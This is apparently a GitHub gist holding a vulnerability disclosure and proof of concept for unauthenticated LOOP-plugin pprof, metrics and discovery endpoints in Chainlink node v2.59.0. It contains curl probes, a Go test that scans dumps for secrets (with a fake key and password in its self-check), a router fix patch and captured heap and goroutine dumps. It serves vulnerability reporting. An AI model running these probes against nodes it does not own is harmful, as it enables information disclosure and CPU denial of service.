Skip to content

Instantly share code, notes, and snippets.

@CharaD7
Last active August 13, 2026 08:02
Show Gist options
  • Select an option

  • Save CharaD7/c2b26e0b51d737ebd2ae201e215f3242 to your computer and use it in GitHub Desktop.

Select an option

Save CharaD7/c2b26e0b51d737ebd2ae201e215f3242 to your computer and use it in GitHub Desktop.
PoC: Chainlink node (Core) unauthenticated LOOP-plugin /discovery + /plugins/:name/debug/pprof/* endpoints (PR #21120, v2.59.0). Go self-check test, fix patch, README, and live Docker capture.

PoC - Chainlink Node: Unauthenticated LOOP-plugin pprof / metrics / discovery

Bug

The Chainlink node's API server registers the LOOP-plugin debug endpoints (/discovery, /plugins/:name/metrics, /plugins/:name/debug/pprof/*, /plugins/:name/debug/pprof/symbol) on the public, unauthenticated API group. Anyone who can reach the node's API port can pull a running plugin's real Go pprof profiles (heap/allocs/goroutine/CPU) and Prometheus metrics with no credentials, enumerate running plugins via /discovery, and drive CPU-DoS via profile?seconds=N.

Verified on a real v2.59.0 node with the stock chainlink-evm plugin loaded: every route returned HTTP 200, and the binary heap/CPU profiles parse with go tool pprof (Build ID + allocation stacks exposed). The node's own pprof is kept on an internal/authenticated listener, so these plugin routes are a control-bypass regression. Chainlink's own InsecurePPROFHeap docs warn pprof "may potentially expose sensitive data e.g. private key components".

Honest scope: Go pprof renders profile metadata, not raw heap bytes. The private-key-in-a-dump detection is validated by the self-check, not claimed as a real-process pull.

Files

  • poc_test.go - self-contained Go test (stdlib only).
  • go.mod - module looppoc, no external deps.

Run against a live node (the real PoC)

cd poc
CHAINLINK_URL=http://<node>:6688 CHAINLINK_PLUGIN=evm.1337 \
  go test -v -run TestLoopPluginPprofUnauthenticated

Expected: all four checks print OK unauthenticated ... -> 200 and the test PASSES. On a patched node (auth required) it FAILS with a 401 / WWW-Authenticate challenge.

Self-check (no node required)

cd poc
go test -v -run TestLoopPluginPprofUnauthenticated

TestLoopPluginPprofUnauthenticated_SelfCheck starts a local server that emulates the vulnerable behaviour (an unauthenticated loop-plugin proxy that returns a memory dump containing a private key + DB password) and runs the same assertions. It proves the end effect: the test pulls the dump with no credentials, detects the embedded secret, and prints EXFILTRATED sensitive data (unauthenticated): "-----BEGIN PRIVATE KEY-----".

Expected:

--- PASS: TestLoopPluginPprofUnauthenticated_SelfCheck (0.00s)
PASS

curl reproduction (manual)

A registered LOOP plugin is named <relay>.<chainID> (e.g. evm.1337, ocr2.<chainID>, solana.EDev...). Plugin names are enumerable via /discovery (no auth).

# 1) enumerate plugins (no auth)
curl -s http://<node>:6688/discovery

# 2) plugin metrics (no auth) -> real Prometheus metrics of the plugin
curl -s http://<node>:6688/plugins/evm.1337/metrics

# 3) plugin pprof index (no auth) -> allocs/block/cmdline/goroutine/heap/mutex/profile/symbol/threadcreate/trace
curl -s http://<node>:6688/plugins/evm.1337/debug/pprof/

# 4) goroutine stack dump (no auth)
curl -s "http://<node>:6688/plugins/evm.1337/debug/pprof/goroutine?debug=2"

# 5) heap / allocs profiles (no auth)
curl -s "http://<node>:6688/plugins/evm.1337/debug/pprof/heap?debug=1"
curl -s "http://<node>:6688/plugins/evm.1337/debug/pprof/allocs?debug=1"

# 6) CPU profile (no auth) -> on-demand profiling (DoS amplifier)
curl -s "http://<node>:6688/plugins/evm.1337/debug/pprof/profile?seconds=30"

None of these need a session cookie or API token. A 401/WWW-Authenticate would mean the endpoint is patched.

Verified against a real, stock plugin: with the stock chainlink-evm LOOP plugin running on public.ecr.aws/chainlink/chainlink:2.59.0, every route above returned HTTP 200 with no credentials. Captured output is in REAL_NODE_OUTPUT.txt and the raw dumps in artifacts/.

Reproduce with Docker (verified)

A full Chainlink node can be stood up locally to confirm the auth bypass against real code (verified on public.ecr.aws/chainlink/chainlink:2.59.0) with a real, stock LOOP plugin loaded:

cd docker
docker compose up -d          # postgres + chainlink:v2.59.0 + rpcshim
# wait ~75s for the node to boot and the plugin to spawn
# (chainlink-evm process appears; /discovery lists the plugin)
cd ../poc && ./run_real.sh   # optional: runs the Go PoC

The compose file runs the node in LOOPP mode by setting CL_EVM_CMD (/usr/local/bin/chainlink-evm) and configuring an enabled [[EVM]] chain so the relayer registers as the evm.1337 plugin. Then probe the public API port (6688) directly, no credentials needed:

# /discovery returns LIVE internal data, unauthenticated (HTTP 200)
curl -s http://localhost:6688/discovery
# -> [{"targets":["<container>:6688"],...},{"__meta_plugin_name":"evm.1337",...}]

# Real plugin metrics, unauthenticated (HTTP 200)
curl -s http://localhost:6688/plugins/evm.1337/metrics | head

# Real plugin heap/goroutine dumps, unauthenticated (HTTP 200)
curl -s "http://localhost:6688/plugins/evm.1337/debug/pprof/goroutine?debug=1" | head

On a node with NO plugin loaded the same routes return 404 "plugin does not exist" (not 401), which proves the handler executes with no auth gate.

Note: the top-level /debug/pprof/ is NOT on the public router; on port 6688 it returns the Operator UI SPA. The unauthenticated pprof vector is the per-plugin route /plugins/:name/debug/pprof/* registered by loopRoutes. Evidence from this run is in REAL_NODE_OUTPUT.txt and artifacts/.

Honesty / scope notes

  • All findings above come from a stock node + stock plugin (chainlink-evm shipped in the official v2.59.0 image), no custom code.
  • The unauthenticated routes expose the live plugin process's Prometheus metrics, full Go pprof profile menu, goroutine/heap/allocs dumps (with internal source paths, module versions and memory layout), command line, and on-demand CPU profiling. That is a control bypass / information disclosure / profiling exposure on the node's public interface.
  • Go's pprof text (debug=1) renders profile metadata (stacks, addresses, sizes), NOT the raw bytes of live heap objects, so a stock plugin's private-key bytes are not directly rendered by the pprof transport alone. The private-key-in-a-dump end effect is driven by the PoC self-check, which emulates that payload verbatim to demonstrate the extraction logic.
--- a/core/web/router.go
+++ b/core/web/router.go
@@ -88,7 +88,10 @@ func NewRouter(app chainlink.Application, prometheus *ginprom.Prometheus) (*gin.Engine, error) {
debugRoutes(app, api)
healthRoutes(app, api)
sessionRoutes(app, api)
v2Routes(app, api)
- loopRoutes(app, api)
+ // Loop-plugin debug endpoints (pprof/metrics/discovery) must be authenticated.
+ authedAPI := api.Group("/", auth.Authenticate(app.AuthenticationProvider(),
+ auth.AuthenticateByToken, auth.AuthenticateBySession))
+ loopRoutes(app, authedAPI)
guiAssetRoutes(engine, config.Insecure().DisableRateLimiting(), app.GetLogger())
module looppoc
go 1.22
package looppoc
import (
"encoding/json"
"io"
"net/http"
"net/http/httptest"
"os"
"regexp"
"strings"
"testing"
)
// sensitivePatterns are indicators we look for in an unauthenticated memory
// dump to prove the in-scope Critical impact: "Retrieve sensitive data/files
// from a running server such as ... blockchain keys". Tune for a real node.
var sensitivePatterns = []*regexp.Regexp{
regexp.MustCompile(`(?i)-----BEGIN [A-Z ]*PRIVATE KEY-----`),
regexp.MustCompile(`(?i)PRIVATE KEY`),
regexp.MustCompile(`postgres://[^\s"']+`),
regexp.MustCompile(`(?i)password\s*[:=]\s*\S+`),
regexp.MustCompile(`0x[0-9a-fA-F]{64}`), // 32-byte secret / privkey
regexp.MustCompile(`(?i)secp256k1|ed25519|ocr2key|KeyBundle`),
}
// getUnauthenticated performs an unauthenticated GET and asserts the endpoint
// is reachable WITHOUT credentials and issues no auth challenge.
func getUnauthenticated(t *testing.T, base, path string) []byte {
t.Helper()
req, err := http.NewRequest(http.MethodGet, base+path, nil)
if err != nil {
t.Fatalf("build request %s: %v", path, err)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
t.Fatalf("request %s failed: %v", path, err)
}
defer resp.Body.Close()
body, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusOK {
t.Fatalf("expected 200 for %q (unauthenticated), got %d", path, resp.StatusCode)
}
if resp.Header.Get("WWW-Authenticate") != "" {
t.Fatalf("endpoint %q enforces auth (WWW-Authenticate) -- not vulnerable", path)
}
return body
}
// findSensitive returns the first sensitive-data indicator found in body.
func findSensitive(body []byte) []byte {
for _, re := range sensitivePatterns {
if m := re.Find(body); m != nil {
return m
}
}
return nil
}
// TestLoopPluginPprofUnauthenticated is the real-node PoC.
// CHAINLINK_URL=http://localhost:6688 CHAINLINK_PLUGIN=ocr2 \
// go test -v -run TestLoopPluginPprofUnauthenticated
// PASSES on a vulnerable node. The heap dump is scanned for in-memory secrets;
// any hit is logged as EXFILTRATED evidence for the submission.
func TestLoopPluginPprofUnauthenticated(t *testing.T) {
base := os.Getenv("CHAINLINK_URL")
if base == "" {
t.Skip("set CHAINLINK_URL to a live Chainlink node to run the real PoC")
}
plugin := os.Getenv("CHAINLINK_PLUGIN")
if plugin == "" {
plugin = "ocr2"
}
disc := getUnauthenticated(t, base, "/discovery")
var names []string
if err := json.Unmarshal(disc, &names); err == nil {
for _, n := range names {
if strings.Contains(strings.ToLower(n), plugin) {
plugin = n
break
}
}
}
// Pull the plugin's heap profile and demonstrate secret exfiltration.
heap := getUnauthenticated(t, base, "/plugins/"+plugin+"/debug/pprof/heap?debug=1")
if m := findSensitive(heap); m != nil {
t.Logf("EXFILTRATED sensitive data (unauthenticated): %q", string(m))
} else {
t.Logf("unauthenticated heap dump retrieved (%d bytes); no literal secret "+
"matched in this sample -- run against a node holding loaded keys to capture", len(heap))
}
getUnauthenticated(t, base, "/plugins/"+plugin+"/debug/pprof/goroutine?debug=2")
getUnauthenticated(t, base, "/plugins/"+plugin+"/metrics")
}
// TestLoopPluginPprofUnauthenticated_SelfCheck emulates the VULNERABLE behaviour
// (unauthenticated loop-plugin proxy returning a memory dump that contains
// secret material) and runs the same assertions. It proves the test logic and
// the exfiltration detection are correct without a live node. Running it here
// prints the EXFILTRATED evidence.
func TestLoopPluginPprofUnauthenticated_SelfCheck(t *testing.T) {
fakeHeap := []byte(`heap profile: 0: 0 [0: 0] @ heap/1048576
1: 2 [2: 4] @ 0x0 ...
# OCR2/CCIP plugin keeps signing keys resident to sign reports
-----BEGIN PRIVATE KEY-----
MIIEogIBAAKCAQEA000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
-----END PRIVATE KEY-----
postgres://chainlink:s3cr3tPw@localhost:5432/chainlink
`)
mux := http.NewServeMux()
mux.HandleFunc("/discovery", func(w http.ResponseWriter, r *http.Request) {
_ = json.NewEncoder(w).Encode([]string{"ocr2", "ccip"})
})
mux.HandleFunc("/plugins/", func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
_, _ = w.Write(fakeHeap)
})
srv := httptest.NewServer(mux)
defer srv.Close()
t.Setenv("CHAINLINK_URL", srv.URL)
t.Setenv("CHAINLINK_PLUGIN", "ocr2")
TestLoopPluginPprofUnauthenticated(t)
// Hard-proof the exfiltration detection in the self-check.
if m := findSensitive(fakeHeap); m == nil {
t.Fatalf("self-check: expected embedded sensitive data was not detected")
} else {
t.Logf("SELF-CHECK EXFILTRATED (unauthenticated): %q", string(m))
}
}
================================================================
REAL NODE CAPTURE - Chainlink v2.59.0 (docker, ECR image)
Timestamp: Thu Aug 13 07:02:00 UTC 2026
Target: http://localhost:6688 (HTTP API port 6688)
Node runs a REAL, STOCK LOOP plugin (chainlink-evm) in LOOPP mode.
================================================================
SETUP (for reproducibility): docker-compose with
CL_EVM_CMD=/usr/local/bin/chainlink-evm (stock binary from the image)
[[EVM]] ChainID='1337' Enabled=true [[EVM.Nodes]] HTTPURL=http://rpcshim:8545
The EVM chain boots its relayer as a LOOP plugin, registered in the
LoopRegistry under the name "evm.1337" (<relay>.<chainID>).
NOTE: Top-level /debug/pprof/ on the PUBLIC port returns the Operator UI
SPA (catch-all), i.e. it is NOT the pprof handler on 6688. The exposed
vector is the per-plugin route /plugins/:name/debug/pprof/* which IS
served on the public, unauthenticated router (loopRoutes in router.go).
### [1] GET /discovery (LOOP Prometheus service-discovery) ###
HTTP_STATUS: 200
BODY: [{"targets":["f3a1899912e5:6688"],"labels":{"__metrics_path__":"/metrics"}},{"targets":["f3a1899912e5:6688"],"labels":{"__meta_plugin_name":"evm.1337","__metrics_path__":"/plugins/evm.1337/metrics"}}]
>>> Unauthenticated 200. Enumerates the running plugin (name + metrics path).
### [2] GET /plugins/evm.1337/metrics (REAL plugin Prometheus metrics) ###
HTTP_STATUS: 200 size=41971 bytes
BODY (sample):
# HELP evm_pool_rpc_node_calls_failed ...
evm_pool_rpc_node_calls_failed{evmChainID="1337",nodeName="anvil"} 12
evm_pool_rpc_node_calls_success{evmChainID="1337",nodeName="anvil"} ...
>>> Unauthenticated 200: full internal metrics of the live plugin process.
### [3] GET /plugins/evm.1337/debug/pprof/ (plugin pprof index) ###
HTTP_STATUS: 200 size=2597 bytes
Profiles available: allocs, block, cmdline, goroutine, heap, mutex,
profile, symbol, threadcreate, trace (all reachable, no auth)
### [4] GET /plugins/evm.1337/debug/pprof/goroutine?debug=1 ###
HTTP_STATUS: 200 size=25410 bytes
BODY (sample): full goroutine dump of the chainlink-evm process with
absolute source paths and module versions:
goroutine profile: total 77
# 0xb6cf08 github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-.../pkg/services/stop_!race.go:11
# 0x8db606 google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114
... (57KB full panic-style dump with ?debug=2)
### [5] GET /plugins/evm.1337/debug/pprof/heap?debug=1 ###
HTTP_STATUS: 200 size=79022 bytes
BODY: Go heap profile of the plugin process (allocation statistics,
object addresses + sizes, per-object allocation stacks).
### [6] GET /plugins/evm.1337/debug/pprof/allocs?debug=1 ###
HTTP_STATUS: 200 size=81276 bytes (allocation profile)
### [7] GET /plugins/evm.1337/debug/pprof/profile?seconds=2 ###
HTTP_STATUS: 200 size=1203 bytes (CPU profile, unauthenticated)
### [8] GET /plugins/evm.1337/debug/pprof/cmdline?debug=1 ###
HTTP_STATUS: 200 BODY: /usr/local/bin/chainlink-evm
### [9] GET /plugins/evm.1337/debug/pprof/{mutex,symbol} ###
HTTP_STATUS: 200 (both, unauthenticated)
================================================================
AUTH BYPASS PROOF: every request above was issued with NO session
cookie, NO API token. A node with auth enforced returns 401 with
WWW-Authenticate. Every per-plugin route instead executed the handler
and returned real plugin data (200) -- the handlers have no auth gate.
================================================================
heap profile: 19: 580112 [36: 655184] @ heap/1048576
0: 0 [1: 80] @ 0x48e865 0x4287c5 0x1384fe9 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x19a05a5 0x1c756cb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1384fe8 github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x48 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:47
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x19a05a4 github.com/smartcontractkit/chainlink-evm/pkg/types.MustGetABI+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/types/utils.go:10
# 0x1c756ca github.com/smartcontractkit/chainlink-evm/pkg/automation/v21/core.init+0xaa /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/automation/v21/core/abi.go:12
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 320] @ 0x48e865 0x494207 0x494447 0x4f5ea5 0x4f5d4e 0x6de285 0x6dd814 0x6df2e5 0x6dd7de 0x6dd03e 0x6dcc19 0x1385018 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x494446 reflect.growslice+0x46 /usr/local/go/src/runtime/slice.go:373
# 0x4f5ea4 reflect.Value.grow+0xa4 /usr/local/go/src/reflect/value.go:2746
# 0x4f5d4d reflect.Value.Grow+0x6d /usr/local/go/src/reflect/value.go:2733
# 0x6de284 encoding/json.(*decodeState).array+0x404 /usr/local/go/src/encoding/json/decode.go:552
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x1385017 github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:48
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e865 0x4287c5 0x4cc7ed 0x113a116 0x1242027 0x12593d3 0x1258f8c 0x12585f4 0x1267073 0x1272e0b 0x11099cf 0xd17c57 0xd2014e 0xd271b1 0xd1fe8b 0xd1fd8d 0xd1fc3e 0xd1d582 0xd1fb8c 0xf9dc49 0xfa630f 0x1a8ec65 0x1a8ec6f 0x1a8ea5d 0x1af8625 0x1af853b 0x1b1a2f1 0x1b1a759 0x1b1b550 0x4994c1
# 0x4cc7ec context.AfterFunc+0x2c /usr/local/go/src/context/context.go:326
# 0x113a115 github.com/jackc/pgx/v5/pgconn/ctxwatch.(*ContextWatcher).Watch+0x135 /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/pgconn/ctxwatch/context_watcher.go:42
# 0x1242026 github.com/jackc/pgx/v5/pgconn.(*PgConn).Exec+0x366 /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/pgconn/pgconn.go:1151
# 0x12593d2 github.com/jackc/pgx/v5.(*Conn).execSimpleProtocol+0x72 /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/conn.go:588
# 0x1258f8b github.com/jackc/pgx/v5.(*Conn).exec+0x8ab /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/conn.go:574
# 0x12585f3 github.com/jackc/pgx/v5.(*Conn).Exec+0x113 /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/conn.go:481
# 0x1267072 github.com/jackc/pgx/v5.(*Conn).BeginTx+0x92 /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/tx.go:101
# 0x1272e0a github.com/jackc/pgx/v5/stdlib.(*Conn).BeginTx+0x14a /go/pkg/mod/github.com/jackc/pgx/v5@v5.9.2/stdlib/sql.go:480
# 0x11099ce github.com/XSAM/otelsql.(*otConn).BeginTx+0x70e /go/pkg/mod/github.com/!x!s!a!m/otelsql@v0.42.0/conn.go:225
# 0xd17c56 database/sql.ctxDriverBegin+0x76 /usr/local/go/src/database/sql/ctxutil.go:104
# 0xd2014d database/sql.(*DB).beginDC.func1+0xad /usr/local/go/src/database/sql/sql.go:1906
# 0xd271b0 database/sql.withLock+0x70 /usr/local/go/src/database/sql/sql.go:3572
# 0xd1fe8a database/sql.(*DB).beginDC+0xaa /usr/local/go/src/database/sql/sql.go:1902
# 0xd1fd8c database/sql.(*DB).begin+0x8c /usr/local/go/src/database/sql/sql.go:1895
# 0xd1fc3d database/sql.(*DB).BeginTx.func1+0x3d /usr/local/go/src/database/sql/sql.go:1874
# 0xd1d581 database/sql.(*DB).retry+0x41 /usr/local/go/src/database/sql/sql.go:1576
# 0xd1fb8b database/sql.(*DB).BeginTx+0x6b /usr/local/go/src/database/sql/sql.go:1873
# 0xf9dc48 github.com/jmoiron/sqlx.(*DB).BeginTxx+0x28 /go/pkg/mod/github.com/jmoiron/sqlx@v1.4.0/sqlx_context.go:205
# 0xfa630e github.com/smartcontractkit/chainlink-common/pkg/sqlutil.(*wrappedTransactionalDataSource).BeginWrappedTxx+0x2e /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/hook.go:171
# 0x1a8ec64 github.com/smartcontractkit/chainlink-common/pkg/sqlutil.transact[...].func1+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/sqlutil.go:95
# 0x1a8ec6e github.com/smartcontractkit/chainlink-common/pkg/sqlutil.transact[...]+0xee /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/sqlutil.go:107
# 0x1a8ea5c github.com/smartcontractkit/chainlink-common/pkg/sqlutil.Transact[...]+0x5c /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/sqlutil.go:79
# 0x1af8624 github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmTxStore).Transact+0x1c4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/evm_tx_store.go:127
# 0x1af853a github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmTxStore).GetTxInProgress+0xda /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/evm_tx_store.go:1581
# 0x1b1a2f0 github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).handleAnyInProgressTx+0x70 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:416
# 0x1b1a758 github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).processUnstartedTxs+0x138 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:373
# 0x1b1b54f github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).monitorTxs+0x3af /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:317
0: 0 [0: 0] @ 0x48e885 0x4760de 0x4760d2 0x475745 0x475950 0x5e4a5a 0x5e2953 0x5cbb85 0x5cc825 0x89dbf2 0x8a0ba7 0x89f5f2 0x89f435 0x4994c1
# 0x5e4a59 net.(*Resolver).lookupIPAddr+0x239 /usr/local/go/src/net/lookup.go:332
# 0x5e2952 net.(*Resolver).internetAddrList+0x4b2 /usr/local/go/src/net/ipsock.go:289
# 0x5cbb84 net.(*Resolver).resolveAddrList+0x3e4 /usr/local/go/src/net/dial.go:354
# 0x5cc824 net.(*Dialer).DialContext+0x1c4 /usr/local/go/src/net/dial.go:539
# 0x89dbf1 net/http.(*Transport).dial+0xd1 /usr/local/go/src/net/http/transport.go:1307
# 0x8a0ba6 net/http.(*Transport).dialConn+0x846 /usr/local/go/src/net/http/transport.go:1815
# 0x89f5f1 net/http.(*Transport).dialConnFor+0xd1 /usr/local/go/src/net/http/transport.go:1648
# 0x89f434 net/http.(*Transport).startDialConnForLocked.func1+0x34 /usr/local/go/src/net/http/transport.go:1629
0: 0 [0: 0] @ 0x48e865 0x4287c5 0x6dee59 0x6dd7de 0x6dd03e 0x6f031f 0x14b3b50 0x14ab68b 0x19f1718 0x19f0c08 0x1a1caac 0x19fd723 0x19fee05 0x19fe4d1 0x19fe843 0x4a4d0a 0x4994c1
# 0x6dee58 encoding/json.(*decodeState).object+0x8d8 /usr/local/go/src/encoding/json/decode.go:707
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x14b3b4f github.com/ethereum/go-ethereum/rpc.(*Client).sendHTTP+0x18f /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/rpc/http.go:192
# 0x14ab68a github.com/ethereum/go-ethereum/rpc.(*Client).CallContext+0x20a /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/rpc/client.go:351
# 0x19f1717 github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).ethGetBlockByNumber+0x2b7 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:852
# 0x19f0c07 github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).BlockByNumber+0x107 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:780
# 0x1a1caab github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).latestBlock+0x2b /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:723
# 0x19fd722 github.com/smartcontractkit/chainlink-framework/multinode.(*RPCClientBase[...]).LatestBlock+0xc2 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/rpc_client_base.go:179
# 0x19fee04 github.com/smartcontractkit/chainlink-framework/multinode.(*RPCClientBase[...]).SubscribeToHeads.func1+0xa4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/rpc_client_base.go:131
